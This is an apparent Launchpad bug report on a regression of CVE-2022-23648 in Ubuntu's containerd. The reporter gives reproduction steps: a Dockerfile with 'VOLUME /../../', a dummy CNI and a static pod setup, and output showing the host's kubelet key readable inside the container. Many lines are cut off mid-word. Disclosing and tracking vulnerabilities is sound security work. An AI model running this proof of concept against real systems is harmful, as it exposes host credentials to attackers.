containerd regression for CVE-2022-23648 in latest version 1.5.9-0ubuntu1~20.04.1
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
containerd (Ubuntu) |
Fix Released
|
Undecided
|
Paulo Flabiano Smorigo | ||
Focal |
Fix Released
|
Undecided
|
Paulo Flabiano Smorigo | ||
Impish |
Fix Released
|
Undecided
|
Paulo Flabiano Smorigo |
Bug Description
Hi,
CVE-2022-23648 allows leaking files on the host inside containers given an attacker crafted image if you use containerd's CRI implementation (e.g. Kubernetes). Ubuntu fixed this in `1.5.5-
This also exists on the latest official Ubuntu EKS AMI (us-west-2 is `ami-05146f3491
I reproduced the bug with the following steps:
1. Build the POC docker image with the following `Dockerfile`:
```
FROM debian:latest
VOLUME /../../
then tag it as `cve-2022-
2. Launch the AMI we're testing (`ami-05146f349
3. To trick containerd into running, give it a dummy CNI (this is because I'm too lazy to spin up a full EKS cluster)
```cat <<EOF | sudo tee /etc/cni/
{
"name": "dummy",
"plugins": [
{
}
}
]
}
EOF```
then restart containerd via `sudo systemctl restart containerd`
4. Create the static pod so kubelet runs it
```sudo mkdir -p /etc/kubernetes
apiVersion: v1
kind: Pod
metadata:
name: poctest
spec:
containers:
- name: poctest
image: <your-registry>
command: ["/bin/bash", "-c", "--"]
args: [ "while true; do sleep 30; done" ]
EOF```
5. Ask kubelet to pick up the static pod, and also ask it to use containerd's CRI and not dockershim
```sudo snap set kubelet-eks pod-manifest-
sudo snap restart kubelet-eks```
6. Wait for the container to come up. `sudo ctr -n [k8s.io](http://
```ubuntu@
CONTAINER IMAGE RUNTIME
209d6f3ddf858df
319c6e9c5c053aa
7. Verify if /var/lib/
```ubuntu@
total 16
drwxr-xr-x 2 root root 4096 May 11 05:09 .
drwxr-xr-x 3 root root 4096 May 11 05:09 ..
-rw-r--r-- 1 root root 2291 May 11 05:02 kubelet.crt
-rw------- 1 root root 1675 May 11 05:02 kubelet.key```
If the files are there, then it's vulnerable.
Thanks,
Kevin R
CVE References
description: | updated |
information type: | Private Security → Public Security |
description: | updated |
Changed in containerd (Ubuntu): | |
assignee: | nobody → Paulo Flabiano Smorigo (pfsmorigo) |
Changed in containerd (Ubuntu Focal): | |
assignee: | nobody → Paulo Flabiano Smorigo (pfsmorigo) |
Changed in containerd (Ubuntu Impish): | |
assignee: | nobody → Paulo Flabiano Smorigo (pfsmorigo) |
Yes, It looks like an SRU has superseded the security fix. Can I make this bug public?